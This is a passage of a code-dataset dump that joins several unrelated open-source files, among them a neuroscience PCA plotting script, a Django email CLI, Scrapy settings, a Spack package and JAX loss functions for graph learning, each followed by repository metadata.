# tsmax[hd] = tsmax[hd].append(tmp, ignore_index = True)
premeanscore[hd]['rip'][session] = prerip_score.mean(1)
posmeanscore[hd]['rip'][session] = posrip_score.mean(1)
# if len(rem_ep.intersect(pre_ep)) and len(rem_ep.intersect(post_ep)):
# premeanscore[hd]['rem'].loc[session,'mean'] = pre_score.restrict(rem_ep.intersect(pre_ep)).mean()
# posmeanscore[hd]['rem'].loc[session,'mean'] = pos_score.restrict(rem_ep.intersect(post_ep)).mean()
# premeanscore[hd]['rem'].loc[session,'std'] = pre_score.restrict(rem_ep.intersect(pre_ep)).std()
# posmeanscore[hd]['rem'].loc[session,'std'] = pos_score.restrict(rem_ep.intersect(post_ep)).std()
return [premeanscore, posmeanscore, tsmax]
# sys.exit()
a = dview.map_sync(compute_pop_pca, datasets)
prescore = {i:pd.DataFrame(index = times) for i in range(3)}
posscore = {i:pd.DataFrame(index = times) for i in range(3)}
for i in range(len(a)):
for j in range(3):
if len(a[i][0][j]['rip'].columns):
s = a[i][0][j]['rip'].columns[0]
prescore[j][s] = a[i][0][j]['rip']
posscore[j][s] = a[i][1][j]['rip']
# prescore = premeanscore
# posscore = posmeanscore
from pylab import *
titles = ['non hd mod', 'hd', 'non hd non mod']
figure()
for i in range(3):
subplot(1,3,i+1)
times = prescore[i].index.values
# for s in premeanscore[i]['rip'].index.values:
# plot(times, premeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'blue')
# plot(times, posmeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'red')
plot(times, gaussFilt(prescore[i].mean(1).values, (1,)), label = 'pre', color = 'blue', linewidth = 2)
plot(times, gaussFilt(posscore[i].mean(1).values, (1,)), label = 'post', color = 'red', linewidth = 2)
legend()
title(titles[i])
show()
sys.exit()
#########################################
# search for peak in 25 ms array
########################################
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(2)}
for i in range(len(a)):
for hd in range(2):
tsmax[hd] = tsmax[hd].append(a[i][2][hd], ignore_index = True)
from pylab import *
plot(tsmax[0]['pos'], np.ones(len(tsmax[0]['pos'])), 'o')
plot(tsmax[0]['pos'].mean(), [1], '|', markersize = 10)
plot(tsmax[1]['pos'], np.zeros(len(tsmax[1]['pos'])), 'o')
plot(tsmax[1]['pos'].mean(), [0], '|', markersize = 10)
sys.exit()
#########################################
# SAVING
########################################
store = pd.HDFStore("../figures/figures_articles/figure3/pca_analysis_3.h5")
for i,j in zip(range(3),('nohd_mod', 'hd', 'nohd_nomod')):
store.put(j+'pre_rip', prescore[i])
store.put(j+'pos_rip', posscore[i])
store.close()
# a = dview.map_sync(compute_population_correlation, datasets[0:15])
# for i in range(len(a)):
# if type(a[i]) is dict:
# s = list(a[i].keys())[0]
# premeanscore.loc[s] = a[i][s]['pre']
# posmeanscore.loc[s] = a[i][s]['pos']
from pylab import *
titles = ['non hd', 'hd']
figure()
for i in range(2):
subplot(1,3,i+1)
times = premeanscore[i]['rip'].columns.values
# for s in premeanscore[i]['rip'].index.values:
# plot(times, premeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'blue')
# plot(times, posmeanscore[i]['rip'].loc[s].values, linewidth = 0.3, color = 'red')
plot(times, gaussFilt(premeanscore[i]['rip'].mean(0).values, (1,)), label = 'pre', color = 'blue', linewidth = 2)
plot(times, gaussFilt(posmeanscore[i]['rip'].mean(0).values, (1,)),label = 'post', color = 'red', linewidth = 2)
legend()
title(titles[i])
subplot(1,3,3)
bar([1,2], [premeanscore[0]['rem'].mean(0)['mean'], premeanscore[1]['rem'].mean(0)['mean']])
bar([3,4], [posmeanscore[0]['rem'].mean(0)['mean'], posmeanscore[1]['rem'].mean(0)['mean']])
xticks([1,2], ['non hd', 'hd'])
xticks([3,4], ['non hd', 'hd'])
show()
figure()
subplot(121)
times = premeanscore[0]['rip'].columns.values
for s in premeanscore[0]['rip'].index.values:
print(s)
plot(times, premeanscore[0]['rip'].loc[s].values, linewidth = 1, color = 'blue')
plot(premeanscore[0]['rip'].mean(0))
subplot(122)
for s in posmeanscore[0]['rip'].index.values:
plot(times, posmeanscore[0]['rip'].loc[s].values, linewidth = 1, color = 'red')
plot(posmeanscore[0]['rip'].mean(0))
show()
|
gpl-3.0
| -4,166,674,322,942,041,600 | 47.621538 | 185 | 0.55069 | false |
Tecktron/quickmailer
|
quickmail.py
|
1
|
3408
|
import argparse
import os
import re
import sys
if __name__ == "__main__":
if sys.version_info < (3, 0):
print("This script requires version 3+ of python. Please try running it with command 'python3' instead")
exit(8)
parser = argparse.ArgumentParser(
description="Quick Mailer"
)
parser.add_argument("-m", "--message", dest="msg", type=str, required=True,
help="The plain text message or filename of a message to send")
parser.add_argument("-t", "--to", dest="to", nargs="+", metavar="[email protected]", type=str,
help="Email address to recieve the message", required=True)
parser.add_argument("-f", "--from", dest="sender", type=str, required=False,
help="The from Email, if not provided, the settings will be used. NOTE: A specific address may "
"be required by your SMTP server")
parser.add_argument("-s", "--subject", dest="subject", required=True, type=str, help="The subject line")
parser.add_argument("-w", "--html", dest="html", action="store_true", required=False,
help="If using a file for m and file is html set this flag to use html email")
parser.add_argument("-a", "--attach", dest="attach", metavar="/path/to/file.txt", nargs="*", required=False,
help="files to attach (use full path)", default=[])
args = parser.parse_args()
# Here we inject the settings and load django
if not os.environ.get("DJANGO_SETTINGS_MODULE", False):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "base.settings")
try:
import django
from django.conf import settings
except ImportError:
django = None
settings = None
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
django.setup()
# don't import Django things until after setup or errors abound
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.utils.html import strip_tags
msg = ""
is_file = False
if os.path.isfile(args.msg) is False:
msg = "{}".format(args.msg)
else:
try:
msg = open(args.msg).read()
except OSError as e:
print("Could not read msg file, exception said: {}".format(e))
exit(4)
sender = args.sender
if not sender:
sender = settings.DEFAULT_FROM_EMAIL
if args.html:
# quick and dirty, create a plain text version.
# replace breaks and paragraphs with newlines
plain = re.sub("<br\s*?>", "\n", msg)
plain = re.sub("</p>", "\n\n", plain)
# strip the rest of the tags.
plain = strip_tags(plain)
email = EmailMultiAlternatives(args.subject, plain, sender, args.to)
email.attach_alternative(msg, "text/html")
else:
email = EmailMessage(args.subject, msg, sender, args.to)
if len(args.attach):
for attachment in args.attach:
if os.path.isfile(attachment):
email.attach_file(attachment)
sent = email.send()
if sent:
print("Email sent successfully")
else:
print("There was an issue sending the message")
|
mit
| -8,947,849,462,155,596,000 | 39.094118 | 120 | 0.60446 | false |
wxgeo/geophar
|
wxgeometrie/param/options.py
|
1
|
4911
|
# -*- coding: utf-8 -*-
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
######################################
# bool -> CheckBox
# file -> sélectionner un répertoire
# str -> TextCtrl
# (min, max) -> SpinCtrl
# [bool] -> CheckListBox
# ['item1', 'blabla2', ...] -> Choice
from copy import deepcopy
from io import IOBase as file
from .modules import modules as _modules, descriptions_modules
class Rubrique(list):
def __init__(self, titre):
self.titre = titre
list.__init__(self)
def add(self, value):
list.append(self, value)
return value
class Options(Rubrique):
pass
class Theme(Rubrique):
pass
class Section(Rubrique):
pass
class Parametre(object):
def __init__(self, _texte, _get = (lambda x:x), _set = (lambda x:x), **kw):
assert len(kw) == 1
self.nom, self.type = kw.popitem()
if '__' in self.nom:
self.prefixe, self.key = self.nom.split('__', 1)
else:
self.prefixe = self.nom
self.key = None
self._get = _get
self._set = _set
self.defaut = deepcopy(self.valeur)
self.texte = _texte
def _get_val(self):
from .. import param
if self.key is None:
val = getattr(param, self.nom)
else:
val = getattr(param, self.prefixe)[self.key]
return self._get(val)
def _set_val(self, val):
from .. import param
val = self._set(val)
if self.key is None:
setattr(param, self.nom, val)
else:
getattr(param, self.prefixe)[self.key] = val
valeur = property(_get_val, _set_val)
P = Parametre
options = Options('Préférences')
## GENERAL
general = options.add(Theme('Général'))
general.add(P('Utilisateur', utilisateur = str))
general.add(P("Nombre maximal d'annulations", nbr_annulations = (0, 1000)))
ouverture = general.add(Section('Au démarrage'))
ouverture.add(P('Restaurer automatiquement la session précédente.', auto_restaurer_session=bool))
fermeture = general.add(Section('À la fermeture'))
fermeture.add(P('Demander confirmation avant de quitter.', confirmer_quitter = bool))
fermeture.add(P('Sauvegarder les préférences.', sauver_preferences = bool))
auto = general.add(Section('Sauvegarde automatique'))
auto.add(P('Intervalle entre deux sauvegardes', sauvegarde_automatique = (0, 10000)))
auto.add('Temps (en dizaine de s) entre deux sauvegardes automatiques.')
auto.add('La valeur 0 désactive la sauvegarde automatique.')
## MODULES
modules = options.add(Theme('Modules'))
liste = modules.add(Section('Activer les modules suivants'))
for nom in _modules:
d = {'modules_actifs__' + nom: bool}
liste.add(P(descriptions_modules[nom]['titre'], **d))
modules.add('Nota: les modules non activés par défaut peuvent être non documentés\net/ou encore expérimentaux.')
#modules.add(P(u'Activer les modules suivants', modules_actifs = dict))
## FORMAT
format = options.add(Theme('Format'))
format.add(P('Décimales affichées', decimales=(0, 10)))
format.add(P('Unité d\'angle',
_get = (lambda k: {'d': 'degré', 'r': 'radian', 'g':' grade'}[k]),
_set = (lambda s: s[0]),
unite_angle = ['degré', 'radian', 'grade']
))
format.add(P('Séparateur décimal',
_get = (lambda k: {',': 'virgule', '.': 'point'}[k]),
_set = (lambda k: {'virgule': ',', 'point': '.'}[k]),
separateur_decimal = ['virgule', 'point']
))
## AVANCÉ
avance = options.add(Theme('Avancé'))
export = avance.add(Section("Export"))
export.add(P("Résolution des images PNG", dpi_export=(10, 10000)))
sauvegarde = avance.add(Section("Sauvegarde"))
sauvegarde.add(P("Compresser les fichiers .geo par défaut.", compresser_geo=bool))
empl_pref = avance.add(Section("Répertoires d'enregistrement"))
empl_pref.add(P("Préférences", emplacements__preferences=open))
empl_pref.add(P("Session", emplacements__session=open))
empl_pref.add(P("Rapports d'erreur", emplacements__log=open))
|
gpl-2.0
| 6,670,033,521,094,492,000 | 31.744966 | 112 | 0.64296 | false |
mikeboers/C3Linearize
|
setup.py
|
1
|
1166
|
from distutils.core import setup
setup(
name='C3Linearize',
version='0.1.0',
description='Python implementation of the C3 linearization algorithm.',
url='http://github.com/mikeboers/C3Linearize',
py_modules=['c3linearize'],
author='Mike Boers',
author_email='[email protected]',
license='BSD-3',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.3',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
bsd-3-clause
| -6,231,679,453,400,698,000 | 34.333333 | 75 | 0.59777 | false |
skosukhin/spack
|
var/spack/repos/builtin/packages/dia/package.py
|
1
|
2553
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Dia(Package):
"""Dia is a program for drawing structured diagrams."""
homepage = 'https://wiki.gnome.org/Apps/Dia'
url = 'https://ftp.gnome.org/pub/gnome/sources/dia/0.97/dia-0.97.3.tar.xz'
version('0.97.3', '0e744a0f6a6c4cb6a089e4d955392c3c')
depends_on('intltool', type='build')
depends_on('[email protected]:+X')
depends_on('libxslt')
depends_on('python')
depends_on('swig')
depends_on('libsm')
depends_on('libuuid')
depends_on('libxinerama')
depends_on('libxrender')
depends_on('libxml2')
depends_on('freetype')
# TODO: Optional dependencies, not yet supported by Spack
# depends_on('libart')
# depends_on('py-pygtk', type=('build', 'run'))
def url_for_version(self, version):
"""Handle Dia's version-based custom URLs."""
return 'https://ftp.gnome.org/pub/gnome/sources/dia/%s/dia-%s.tar.xz' % (version.up_to(2), version)
def install(self, spec, prefix):
# configure, build, install:
options = ['--prefix=%s' % prefix,
'--with-cairo',
'--with-xslt-prefix=%s' % spec['libxslt'].prefix,
'--with-python',
'--with-swig']
configure(*options)
make()
make('install')
|
lgpl-2.1
| 524,486,476,142,904,800 | 37.681818 | 107 | 0.62358 | false |
Pikecillo/genna
|
external/4Suite-XML-1.0.2/Ft/Xml/XPath/ParsedRelativeLocationPath.py
|
1
|
1412
|
########################################################################
# $Header: /var/local/cvsroot/4Suite/Ft/Xml/XPath/ParsedRelativeLocationPath.py,v 1.4 2005/02/09 11:10:54 mbrown Exp $
"""
A parsed token that represents a relative location path in the parsed result tree.
Copyright 2005 Fourthought, Inc. (USA).
Detailed license and copyright information: http://4suite.org/COPYRIGHT
Project home, documentation, distributions: http://4suite.org/
"""
class ParsedRelativeLocationPath:
def __init__(self, left, right):
self._left = left
self._right = right
return
def evaluate(self, context):
nodeset = self._left.select(context)
state = context.copy()
result = []
size = len(nodeset)
for pos in xrange(size):
context.node, context.position, context.size = \
nodeset[pos], pos + 1, size
result.extend(self._right.select(context))
context.set(state)
return result
select = evaluate
def pprint(self, indent=''):
print indent + str(self)
self._left.pprint(indent + ' ')
self._right.pprint(indent + ' ')
def __str__(self):
return '<RelativeLocationPath at %x: %s>' % (
id(self),
repr(self),
)
def __repr__(self):
return repr(self._left) + '/' + repr(self._right)
|
gpl-2.0
| -7,323,416,474,104,998,000 | 30.377778 | 118 | 0.55949 | false |
watsonpy/watson-auth
|
docs/conf.py
|
1
|
2537
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Watson - Auth documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 17 14:49:48 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import watson.auth
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinxcontrib.napoleon'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = 'Watson - Auth'
copyright = '2014, Simon Coulton'
version = watson.auth.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
html_static_path = ['_static']
htmlhelp_basename = 'Watson-Authdoc'
# html_sidebars = {}
html_show_sourcelink = False
html_show_sphinx = False
# -- Options for manual page output ---------------------------------------
man_pages = [
('index', 'watson-auth', 'Watson - Auth Documentation',
['Simon Coulton'], 1)
]
# -- Options for Texinfo output -------------------------------------------
texinfo_documents = [
('index', 'Watson-Auth', 'Watson - Auth Documentation',
'Simon Coulton', 'Watson-Auth', 'Authorization and authentication library for Watson.',
'Miscellaneous'),
]
texinfo_appendices = []
# Intersphinx Mapping
# Autodoc
def skip(app, what, name, obj, skip, options):
if name == '__init__':
return False
elif name in ('__module__', '__doc__', '__abstractmethods__'):
return True
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
|
bsd-3-clause
| 2,506,785,883,207,107,000 | 24.626263 | 92 | 0.637761 | false |
Clebeuf/MAPE-K-Python
|
MAPE-K/ManagedScraper/ManagedScraper/settings.py
|
1
|
3357
|
# -*- coding: utf-8 -*-
# Scrapy settings for ManagedScraper project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'ManagedScraper'
SPIDER_MODULES = ['ManagedScraper.spiders']
NEWSPIDER_MODULE = 'ManagedScraper.spiders'
#ITEM_PIPELINES = {'ManagedScraper.pipelines.MetadataFilterPipeline': 100}
DOWNLOAD_DELAY = 1
#RANDOM_DOWNLOAD_DELAY = TRUE
#CONCURRENT_REQUESTS = 5
#CONCURRENT_REQUESTS_PER_IP = 1
# Crawl responsibly by identifying yourself (and your website) on the user-agent
SER_AGENT = 'ResearchSurveyCrawler (SAS)'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'ManagedScraper (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'ManagedScraper.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'ManagedScraper.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'ManagedScraper.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
mit
| 6,122,486,349,990,847,000 | 35.096774 | 109 | 0.777778 | false |
deepmind/deepmind-research
|
ogb_lsc/mag/losses.py
|
1
|
6654
|
# Copyright 2021 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Losses and related utilities."""
from typing import Mapping, Tuple, Sequence, NamedTuple, Dict, Optional
import jax
import jax.numpy as jnp
import jraph
import numpy as np
# pylint: disable=g-bad-import-order
import datasets
LogsDict = Mapping[str, jnp.ndarray]
class Predictions(NamedTuple):
node_indices: np.ndarray
labels: np.ndarray
predictions: np.ndarray
logits: np.ndarray
def node_classification_loss(
logits: jnp.ndarray,
batch: datasets.Batch,
extra_stats: bool = False,
) -> Tuple[jnp.ndarray, LogsDict]:
"""Gets node-wise classification loss and statistics."""
log_probs = jax.nn.log_softmax(logits)
loss = -jnp.sum(log_probs * batch.node_labels, axis=-1)
num_valid = jnp.sum(batch.label_mask)
labels = jnp.argmax(batch.node_labels, axis=-1)
is_correct = (jnp.argmax(log_probs, axis=-1) == labels)
num_correct = jnp.sum(is_correct * batch.label_mask)
loss = jnp.sum(loss * batch.label_mask) / (num_valid + 1e-8)
accuracy = num_correct / (num_valid + 1e-8)
entropy = -jnp.mean(jnp.sum(jax.nn.softmax(logits) * log_probs, axis=-1))
stats = {
'classification_loss': loss,
'prediction_entropy': entropy,
'accuracy': accuracy,
'num_valid': num_valid,
'num_correct': num_correct,
}
if extra_stats:
for k in range(1, 6):
stats[f'top_{k}_correct'] = topk_correct(logits, labels,
batch.label_mask, k)
return loss, stats
def get_predictions_labels_and_logits(
logits: jnp.ndarray,
batch: datasets.Batch,
) -> Tuple[jnp.ndarray, jnp.ndarray, jnp.ndarray, jnp.ndarray]:
"""Gets prediction labels and logits."""
mask = batch.label_mask > 0.
indices = batch.node_indices[mask]
logits = logits[mask]
predictions = jnp.argmax(logits, axis=-1)
labels = jnp.argmax(batch.node_labels[mask], axis=-1)
return indices, predictions, labels, logits
def topk_correct(
logits: jnp.ndarray,
labels: jnp.ndarray,
valid_mask: jnp.ndarray,
topk: int,
) -> jnp.ndarray:
"""Calculates top-k accuracy."""
pred_ranking = jnp.argsort(logits, axis=1)[:, ::-1]
pred_ranking = pred_ranking[:, :topk]
is_correct = jnp.any(pred_ranking == labels[:, jnp.newaxis], axis=1)
return (is_correct * valid_mask).sum()
def ensemble_predictions_by_probability_average(
predictions_list: Sequence[Predictions]) -> Predictions:
"""Ensemble predictions by ensembling the probabilities."""
_assert_consistent_predictions(predictions_list)
all_probs = np.stack([
jax.nn.softmax(predictions.logits, axis=-1)
for predictions in predictions_list
],
axis=0)
ensembled_logits = np.log(all_probs.mean(0))
return predictions_list[0]._replace(
logits=ensembled_logits, predictions=np.argmax(ensembled_logits, axis=-1))
def get_accuracy_dict(predictions: Predictions) -> Dict[str, float]:
"""Returns the accuracy dict."""
output_dict = {}
output_dict['num_valid'] = predictions.predictions.shape[0]
matches = (predictions.labels == predictions.predictions)
output_dict['accuracy'] = matches.mean()
pred_ranking = jnp.argsort(predictions.logits, axis=1)[:, ::-1]
for k in range(1, 6):
matches = jnp.any(
pred_ranking[:, :k] == predictions.labels[:, None], axis=1)
output_dict[f'top_{k}_correct'] = matches.mean()
return output_dict
def bgrl_loss(
first_online_predictions: jnp.ndarray,
second_target_projections: jnp.ndarray,
second_online_predictions: jnp.ndarray,
first_target_projections: jnp.ndarray,
symmetrize: bool,
valid_mask: jnp.ndarray,
) -> Tuple[jnp.ndarray, LogsDict]:
"""Implements BGRL loss."""
first_side_node_loss = jnp.sum(
jnp.square(
_l2_normalize(first_online_predictions, axis=-1) -
_l2_normalize(second_target_projections, axis=-1)),
axis=-1)
if symmetrize:
second_side_node_loss = jnp.sum(
jnp.square(
_l2_normalize(second_online_predictions, axis=-1) -
_l2_normalize(first_target_projections, axis=-1)),
axis=-1)
node_loss = first_side_node_loss + second_side_node_loss
else:
node_loss = first_side_node_loss
loss = (node_loss * valid_mask).sum() / (valid_mask.sum() + 1e-6)
return loss, dict(bgrl_loss=loss)
def get_corrupted_view(
graph: jraph.GraphsTuple,
feature_drop_prob: float,
edge_drop_prob: float,
rng_key: jnp.ndarray,
) -> jraph.GraphsTuple:
"""Returns corrupted graph view."""
node_key, edge_key = jax.random.split(rng_key)
def mask_feature(x):
mask = jax.random.bernoulli(node_key, 1 - feature_drop_prob, x.shape)
return x * mask
# Randomly mask features with fixed probability.
nodes = jax.tree_map(mask_feature, graph.nodes)
# Simulate dropping of edges by changing genuine edges to self-loops on
# the padded node.
num_edges = graph.senders.shape[0]
last_node_idx = graph.n_node.sum() - 1
edge_mask = jax.random.bernoulli(edge_key, 1 - edge_drop_prob, [num_edges])
senders = jnp.where(edge_mask, graph.senders, last_node_idx)
receivers = jnp.where(edge_mask, graph.receivers, last_node_idx)
# Note that n_edge will now be invalid since edges in the middle of the list
# will correspond to the final graph. Set n_edge to None to ensure we do not
# accidentally use this.
return graph._replace(
nodes=nodes,
senders=senders,
receivers=receivers,
n_edge=None,
)
def _assert_consistent_predictions(predictions_list: Sequence[Predictions]):
first_predictions = predictions_list[0]
for predictions in predictions_list:
assert np.all(predictions.node_indices == first_predictions.node_indices)
assert np.all(predictions.labels == first_predictions.labels)
assert np.all(
predictions.predictions == np.argmax(predictions.logits, axis=-1))
def _l2_normalize(
x: jnp.ndarray,
axis: Optional[int] = None,
epsilon: float = 1e-6,
) -> jnp.ndarray:
return x * jax.lax.rsqrt(
jnp.sum(jnp.square(x), axis=axis, keepdims=True) + epsilon)
|
apache-2.0
| -7,726,497,317,545,474,000 | 32.437186 | 80 | 0.681996 | false |
nerdvegas/rez
|
src/rez/data/tests/release/build.py
|
1
|
1566
|
from __future__ import print_function
import shutil
import os.path
import os
import sys
def build(source_path, build_path, install_path, targets):
def _copy(src, dest):
print("copying %s to %s..." % (src, dest))
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
# build
src = os.path.join(source_path, "data")
dest = os.path.join(build_path, "data")
_copy(src, dest)
if "install" not in (targets or []):
return
# install
src = os.path.join(build_path, "data")
dest = os.path.join(install_path, "data")
_copy(src, dest)
if __name__ == '__main__':
build(
source_path=os.environ['REZ_BUILD_SOURCE_PATH'],
build_path=os.environ['REZ_BUILD_PATH'],
install_path=os.environ['REZ_BUILD_INSTALL_PATH'],
targets=sys.argv[1:]
)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
lgpl-3.0
| -7,258,360,811,447,583,000 | 28.54717 | 79 | 0.667944 | false |
brigittebigi/proceed
|
proceed/scripts/import.py
|
1
|
9928
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# ---------------------------------------------------------------------------
# ___ __ ___ ___ ____ ____ __
# | \ | \ | | / | | | \ Automatic
# |__/ |__/ | | | |__ |__ | | Conference
# | |\_ | | | | | | | Proceedings
# | | \ |___| \___ |___ |___ |__/ Generator
# ==========================================================
#
# http://www.lpl-aix.fr/~bigi/
#
# ---------------------------------------------------------------------------
# developed at:
#
# Laboratoire Parole et Langage
#
# Copyright (C) 2013-2014 Brigitte Bigi
#
# Use of this software is governed by the GPL, v3
# This banner notice must not be removed
# ---------------------------------------------------------------------------
#
# SPPAS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SPPAS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------
__docformat__ = "epytext"
"""
Import abstracts from a conference and save them in a directory,
in the form of one latex file per abstract.
Input can be one of sciencesconf XML file or easychair CSV file.
No options for the output style: use default.
"""
# ---------------------------------------------------------------------------
import sys
import os.path
import getopt
sys.path.append( os.path.join(os.path.dirname(os.path.dirname( os.path.abspath(__file__))), "src") )
from DataIO.Read.reader import Reader
from DataIO.Write.writer import Writer
from structs.prefs import Preferences
from structs.abstracts_themes import all_themes
from term.textprogress import TextProgress
from term.terminalcontroller import TerminalController
from sp_glob import program, author, version, copyright, url
wxop = True
try:
import wx
from wxgui.frames.import_wizard import ImportWizard
except Exception:
wxop = False
# ----------------------------------------------------------------------
# USEFUL FUNCTIONS
# ----------------------------------------------------------------------
def usage(output):
"""
Print the usage of this script on an output.
